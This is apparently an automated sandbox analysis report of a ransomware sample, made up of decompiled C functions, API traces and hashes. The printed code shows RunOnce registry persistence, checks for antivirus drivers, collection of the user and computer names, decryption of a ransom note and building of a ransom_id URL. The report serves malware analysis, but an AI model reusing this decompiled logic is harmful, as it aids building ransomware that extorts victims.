0x00a86a0f
0x00a86a15
0x00a86a1d
0x00a86a1d
0x00a86a23
0x00a86a29
0x00a86a31
0x00a86a37
0x00a86a3f
0x00a86a3f
0x00a86a45
0x00a86a4b
0x00a86a53
0x00a86a59
0x00a86a61
0x00a86a61
0x00a86a67
0x00a86a6d
0x00a86a75
0x00a86a7b
0x00a86a83
0x00a86a83
0x00a86a89
0x00a86a8f
0x00a86a97
0x00a86a9d
0x00a86aa5
0x00a86aa5
0x00a86aab
0x00a86ab1
0x00a86ab9
0x00a86abf
0x00a86ac7
0x00a86ac7
0x00a86acd
0x00a86ad3
0x00a86adb
0x00a86ae1
0x00a86ae9
0x00a86ae9
0x00a86aef
0x00a86afc
0x00a86b02
0x00a86b05
0x00a86b0a
0x00a86b27
0x00a86b0c
0x00a86b16
0x00a86b1c
0x00a86b34
0x00a86b3c
0x00a86b42
0x00a86b4a
0x00a86b56
0x00a86b56
0x00a86b60
0x00a86b66
0x00a86b6e
0x00a86b74
0x00a86b7c
0x00a86b7c
0x00a86b88
0x00a86b92

APIs

lstrcatW.KERNEL32(?,?), ref: 00A869C1
lstrcatW.KERNEL32(?,00A903F0), ref: 00A869C9
lstrcatW.KERNEL32(?,?), ref: 00A869D2
lstrcatW.KERNEL32(?,00A903F4), ref: 00A869DA
lstrcatW.KERNEL32(?,?), ref: 00A869E5
lstrcatW.KERNEL32(?,00A903F0), ref: 00A869ED
lstrcatW.KERNEL32(?,?), ref: 00A869F3
lstrcatW.KERNEL32(?,00A903F4), ref: 00A869FB
lstrcatW.KERNEL32(?,?), ref: 00A86A07
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86A0F
lstrcatW.KERNEL32(?,?), ref: 00A86A15
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86A1D
lstrcatW.KERNEL32(?,?), ref: 00A86A29
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86A31
lstrcatW.KERNEL32(?,?), ref: 00A86A37
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86A3F
lstrcatW.KERNEL32(?,?), ref: 00A86A4B
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86A53
lstrcatW.KERNEL32(?,?), ref: 00A86A59
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86A61
lstrcatW.KERNEL32(?,?), ref: 00A86A6D
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86A75
lstrcatW.KERNEL32(?,00A848B6), ref: 00A86A7B
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86A83
lstrcatW.KERNEL32(?,?), ref: 00A86A8F
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86A97
lstrcatW.KERNEL32(?,?), ref: 00A86A9D
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86AA5
lstrcatW.KERNEL32(?,?), ref: 00A86AB1
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86AB9
lstrcatW.KERNEL32(?,?), ref: 00A86ABF
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86AC7
lstrcatW.KERNEL32(?,?), ref: 00A86AD3
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86ADB
lstrcatW.KERNEL32(?,?), ref: 00A86AE1
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86AE9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,00A845E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00A86AFC
wsprintfW.USER32 ref: 00A86B16
wsprintfW.USER32 ref: 00A86B27
lstrcatW.KERNEL32(?,?), ref: 00A86B34
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86B3C
lstrcatW.KERNEL32(?,?), ref: 00A86B42
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86B4A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00A86B56
lstrcatW.KERNEL32(?,?), ref: 00A86B66
lstrcatW.KERNEL32(?,00A903F0), ref: 00A86B6E
lstrcatW.KERNEL32(?,?), ref: 00A86B74
lstrcatW.KERNEL32(?,00A903F4), ref: 00A86B7C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A845E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A86B7F

Strings

undefined, xrefs: 00A86B21
%x%x, xrefs: 00A86B10

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 69d8c5f1ca8a2ced67b08cbed4246ca4f6151de0d1fbeee0ba264bcd9d0b3d1a
Instruction ID: 23e458cba9b10ba1c2359fbff489aaa4a1e7af76cf2f6e88e434484c20f7f70f
Opcode Fuzzy Hash: 69d8c5f1ca8a2ced67b08cbed4246ca4f6151de0d1fbeee0ba264bcd9d0b3d1a
Instruction Fuzzy Hash: 53513D31281A65BBEF273F658C49F9F3A69FF85740F054450FA0028095CB798652DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00A82960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00A82960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E00A87C60( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x00a8296b
0x00a8296d
0x00a82979
0x00a82980
0x00a82984
0x00a8298c
0x00a82993
0x00a8299a
0x00a829a8
0x00a829b0
0x00a829bd
0x00a829c7
0x00a829ce
0x00a829eb
0x00a829f8
0x00a829ff
0x00a82a06
0x00a82a0d
0x00a82a14
0x00a82a1b
0x00a82a22
0x00a82a29
0x00a82a30
0x00a82a37
0x00a82a3e
0x00a82a45
0x00a82a4c
0x00a82a53
0x00a82a5a
0x00a82a61
0x00a82a68
0x00a82a6f
0x00a82a76
0x00a82a7d
0x00a82a84
0x00a82a8c
0x00a82ac7
0x00a82a8e
0x00a82aa4
0x00a82aaf
0x00a82ab1
0x00a82ab7
0x00a82abf
0x00a82abf

APIs

lstrlenW.KERNEL32(00520050,00000041,746982B0,00000000), ref: 00A8299D

Part of subcall function 00A87C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00A87C7D
Part of subcall function 00A87C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00A87CAB
Part of subcall function 00A87C60: GetModuleHandleA.KERNEL32(?), ref: 00A87CFF
Part of subcall function 00A87C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00A87D0D
Part of subcall function 00A87C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00A87D1C
Part of subcall function 00A87C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87D65
Part of subcall function 00A87C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87D73

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,00A82C45,00000000), ref: 00A82A84
lstrlenW.KERNEL32(00000000), ref: 00A82A8F
RegSetValueExW.KERNEL32(00A82C45,00520050,00000000,00000001,00000000,00000000), ref: 00A82AA4
RegCloseKey.KERNEL32(00A82C45), ref: 00A82AB1

Strings

r, xrefs: 00A82A53
I, xrefs: 00A82979
V, xrefs: 00A82A4C
i, xrefs: 00A82A5A
\, xrefs: 00A829EB
A, xrefs: 00A8298C
d, xrefs: 00A82A22
R, xrefs: 00A82A68
f, xrefs: 00A82A0D
s, xrefs: 00A82A06
U, xrefs: 00A82984
F, xrefs: 00A829BD
n, xrefs: 00A82A6F
P, xrefs: 00A8296D
H, xrefs: 00A82993
r, xrefs: 00A829FF
S, xrefs: 00A829B0
u, xrefs: 00A82A37
n, xrefs: 00A82A45
\, xrefs: 00A82A30
e, xrefs: 00A82A7D
i, xrefs: 00A82A1B
W, xrefs: 00A829C7
w, xrefs: 00A82A29
n, xrefs: 00A82A61
i, xrefs: 00A829F8
R, xrefs: 00A829CE
\, xrefs: 00A82A14
r, xrefs: 00A82A3E
n, xrefs: 00A82A76

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 96c6e6364b76a093ac192c1ce5c987049623ceb265135f87ef3b855c430e50c0
Instruction ID: e8c55bf632d7b16ec925ac9ec1b3cc75fe30d93f55d08de92241fc2cb7401c84
Opcode Fuzzy Hash: 96c6e6364b76a093ac192c1ce5c987049623ceb265135f87ef3b855c430e50c0
Instruction Fuzzy Hash: 7631DAB090021CDAEB20CF91E849BEEBFB5FB01709F208119D5196A291D7BA4949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A82D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00A82D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E00A82F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E00A82C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E00A82D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E00A82F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E00A82F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E00A830A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E00A82AD0(); // executed
				goto L5;
			}

0x00a82d39
0x00a82d3a
0x00a82d3d
0x00a82d45
0x00a82d4a
0x00a82d52
0x00a82d5a
0x00a82d62
0x00a82d67
0x00a82d6f
0x00a82d77
0x00a82d7f
0x00a82d87
0x00a82d8e
0x00a82de9
0x00a82df1
0x00a82df9
0x00a82e01
0x00a82e09
0x00a82e11
0x00a82e22
0x00a82e26
0x00a82e3d
0x00a82e41
0x00a82e49
0x00a82e51
0x00a82e5f
0x00a82e68
0x00a82e6e
0x00a82e73
0x00a82e7b
0x00a82eaf
0x00a82eb4
0x00a82ebc
0x00a82ec8
0x00a82ecf
0x00a82ee3
0x00a82eeb
0x00a82eee
0x00a82eee
0x00a82f09
0x00a82f3d
0x00a82f3f
0x00a82f0b
0x00a82f17
0x00a82f1c
0x00a82f25
0x00000000
0x00a82f17
0x00a82f09
0x00a82ebf
0x00a82ebf
0x00a82e75
0x00a82e75
0x00a82d94
0x00a82d9b
0x00000000
0x00000000
0x00a82da1
0x00a82da9
0x00a82db1
0x00a82db9
0x00a82dc1
0x00a82dc9
0x00a82dd0
0x00000000
0x00000000
0x00a82dd6
0x00a82ddd
0x00000000
0x00000000
0x00a82de3
0x00a82de4
0x00000000

APIs

Part of subcall function 00A82F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00A82F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00A82E19
LoadCursorW.USER32(00000000,00007F00), ref: 00A82E2E
LoadIconW.USER32 ref: 00A82E59
RegisterClassExW.USER32 ref: 00A82E68
ExitThread.KERNEL32 ref: 00A82E75

Part of subcall function 00A82F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A82F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00A82E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00A82E81
CreateWindowExW.USER32 ref: 00A82EA7
SetWindowLongW.USER32 ref: 00A82EB4
ExitThread.KERNEL32 ref: 00A82EBF

Part of subcall function 00A82F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 00A82FA8
Part of subcall function 00A82F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 00A82FCF
Part of subcall function 00A82F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00A82FE3
Part of subcall function 00A82F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A82FFA

ExitThread.KERNEL32 ref: 00A82F3F

Part of subcall function 00A82AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00A82AEA
Part of subcall function 00A82AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00A82B2C
Part of subcall function 00A82AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00A82B38
Part of subcall function 00A82AD0: ExitThread.KERNEL32 ref: 00A82C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00A82EC8
UpdateWindow.USER32(00000000), ref: 00A82ECF
CreateThread.KERNEL32 ref: 00A82EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00A82EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A82F05
TranslateMessage.USER32(?), ref: 00A82F1C
DispatchMessageW.USER32 ref: 00A82F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A82F37

Strings

0, xrefs: 00A82DF1
d, xrefs: 00A82DA9
f, xrefs: 00A82DA1
s, xrefs: 00A82D77
firefox, xrefs: 00A82E9B
win32app, xrefs: 00A82E51, 00A82EA0
w, xrefs: 00A82DB1
s, xrefs: 00A82DC1
s, xrefs: 00A82DB9
k, xrefs: 00A82D67
s, xrefs: 00A82D7F
1, xrefs: 00A82D6F

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 36abe9998be5086c2eed84ea5885f1a338b7b1ad54fe52ba544f109b02af4bcf
Instruction ID: 8462264cd9ea4f4c71028e7d8d57783f0dc0c3d1ee2e38ff9cafdc45dc83a706
Opcode Fuzzy Hash: 36abe9998be5086c2eed84ea5885f1a338b7b1ad54fe52ba544f109b02af4bcf
Instruction Fuzzy Hash: A4516070548301AFE720EFA18D4DB6B7FE4AF44B48F10091CF684A61D0E7B59546CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00A840A0 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 167
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00A840A0(void* __ecx) {
				char _v148;
				char _v152;
				void* _v156;
				short _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char _v232;
				WCHAR* _v236;
				WCHAR* _v240;
				void* _t44;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t52;
				WCHAR* _t56;
				signed short _t60;
				signed short* _t61;
				WCHAR* _t68;
				signed int _t73;
				signed int _t74;
				void* _t77;
				void* _t80;
				long _t83;
				WCHAR* _t84;
				signed int _t87;
				void* _t88;
				WCHAR* _t90;
				void* _t92;
				WCHAR* _t113;

				if( *0xa92b04 != 0) {
					L25:
					return _t44;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E00A839B0( &_v148);
				E00A86D90( &_v236); // executed
				_t87 = E00A86BA0( &_v236);
				_t83 = 0x42 + _t87 * 2;
				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40); // executed
				_v240 = _t48;
				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
					_t88 = 0;
				} else {
					_t88 = _t48;
				}
				E00A869A0( &_v152, _t88); // executed
				_t50 = E00A87BA0(_t88, L"ransom_id=");
				_t51 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xa90940]");
				_t68 = 0xa92000;
				_t77 = 0xad;
				_t90 = _t50 + _t51 * 2;
				_t52 = 0xad0;
				_v240 = _t90;
				do {
					_t13 =  &(_t68[8]); // 0x44004e
					_t68 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				do {
					 *(_t52 + 0xa92000) =  *(_t52 + 0xa92000) ^ 0x00000005;
					_t52 = _t52 + 1;
				} while (_t52 < 0xad6);
				 *0xa92b04 = 0xa92000;
				_t84 = E00A87BA0(0xa92000, L"{USERID}");
				if(_t84 == 0) {
					L21:
					_v232 = 0x740068;
					_v228 = 0x700074;
					_v224 = 0x2f003a;
					_v220 = 0x67002f;
					_v216 = 0x630064;
					_v212 = 0x670062;
					_v208 = 0x760068;
					_v204 = 0x79006a;
					_v200 = 0x790071;
					_v196 = 0x6a0037;
					_v192 = 0x6c0063;
					_v188 = 0x2e006b;
					_v184 = 0x6e006f;
					_v180 = 0x6f0069;
					_v176 = 0x2e006e;
					_v172 = 0x6f0074;
					_v168 = 0x2f0070;
					_v164 = 0;
					_t113 =  *0xa92ae4; // 0x880000
					if(_t113 == 0) {
						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xa92ae4 = _t56;
						if(_t56 != 0) {
							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
						}
					}
					VirtualFree(_v156, 0, 0x8000); // executed
					_t44 = E00A87720( &_v152);
					goto L25;
				}
				while(1) {
					L11:
					lstrcpyW(_t84, _t90);
					_t84[lstrlenW(_t84)] = 0x20;
					_t84 = 0xa92000;
					_t60 =  *0xa92000; // 0xfeff
					if(_t60 == 0) {
						goto L21;
					}
					_t73 = _t60 & 0x0000ffff;
					_t92 = 0xa92000 - L"{USERID}";
					do {
						_t61 = L"{USERID}";
						if(_t73 == 0) {
							goto L19;
						}
						while(1) {
							_t74 =  *_t61 & 0x0000ffff;
							if(_t74 == 0) {
								break;
							}
							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
							if(_t80 != 0) {
								L18:
								if( *_t61 == 0) {
									break;
								}
								goto L19;
							}
							_t61 =  &(_t61[1]);
							if( *(_t92 + _t61) != _t80) {
								continue;
							}
							goto L18;
						}
						_t90 = _v236;
						goto L11;
						L19:
						_t20 =  &(_t84[1]); // 0x2d002d
						_t73 =  *_t20 & 0x0000ffff;
						_t84 =  &(_t84[1]);
						_t92 = _t92 + 2;
					} while (_t73 != 0);
					_t90 = _v236;
					goto L21;
				}
				goto L21;
			}

0x00a840b5
0x00a8431c
0x00a84321
0x00a84321
0x00a840bb
0x00a840bc
0x00a840be
0x00a840bf
0x00a840c4
0x00a840c6
0x00a840c7
0x00a840c9
0x00a840ca
0x00a840cc
0x00a840cd
0x00a840cf
0x00a840d0
0x00a840d5
0x00a840d7
0x00a840d8
0x00a840e1
0x00a840ea
0x00a840f8
0x00a84101
0x00a8410b
0x00a84111
0x00a84117
0x00a84128
0x00a84124
0x00a84124
0x00a84124
0x00a8412f
0x00a8413b
0x00a84147
0x00a8414d
0x00a84155
0x00a8415a
0x00a8415f
0x00a84162
0x00a84167
0x00a84170
0x00a84170
0x00a84170
0x00a84173
0x00a84178
0x00a8417c
0x00a84181
0x00a84181
0x00a84190
0x00a84190
0x00a84197
0x00a84198
0x00a841a4
0x00a841b8
0x00a841bc
0x00a8423a
0x00a8423c
0x00a84244
0x00a8424c
0x00a84254
0x00a8425c
0x00a84264
0x00a8426c
0x00a84274
0x00a8427c
0x00a84284
0x00a8428c
0x00a84294
0x00a8429c
0x00a842a4
0x00a842ac
0x00a842b4
0x00a842bc
0x00a842c4
0x00a842c9
0x00a842cf
0x00a842de
0x00a842e4
0x00a842eb
0x00a842f9
0x00a842ff
0x00a842eb
0x00a8430d
0x00a84317
0x00000000
0x00a84317
0x00a841c0
0x00a841c0
0x00a841c2
0x00a841d4
0x00a841d8
0x00a841dd
0x00a841e6
0x00000000
0x00000000
0x00a841ea
0x00a841ed
0x00a841f3
0x00a841f3
0x00a841fb
0x00000000
0x00000000
0x00a84200
0x00a84200
0x00a84206
0x00000000
0x00000000
0x00a84210
0x00a84212
0x00a8421d
0x00a84221
0x00000000
0x00000000
0x00000000
0x00a84221
0x00a84214
0x00a8421b
0x00000000
0x00000000
0x00000000
0x00a8421b
0x00a84322
0x00000000
0x00a84227
0x00a84227
0x00a84227
0x00a8422b
0x00a8422e
0x00a84231
0x00a84236
0x00000000
0x00a84236
0x00000000

APIs

Part of subcall function 00A839B0: GetProcessHeap.KERNEL32(?,?,00A84587,00000000,?,00000000), ref: 00A83A4C

Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00A86DB7
Part of subcall function 00A86D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00A86DC8
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00A86DE6
Part of subcall function 00A86D90: GetComputerNameW.KERNEL32 ref: 00A86DF0
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E10
Part of subcall function 00A86D90: wsprintfW.USER32 ref: 00A86E51
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E6E
Part of subcall function 00A86D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00A86E92
Part of subcall function 00A86D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00A86EB6
Part of subcall function 00A86D90: RegCloseKey.KERNEL32(00000000), ref: 00A86ED2

Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BF2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BFD
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C13
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C1E
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(00A848B6,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C34
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C3F
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C55
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C60
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C76
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C81
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C97
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CA2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CC1
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8410B
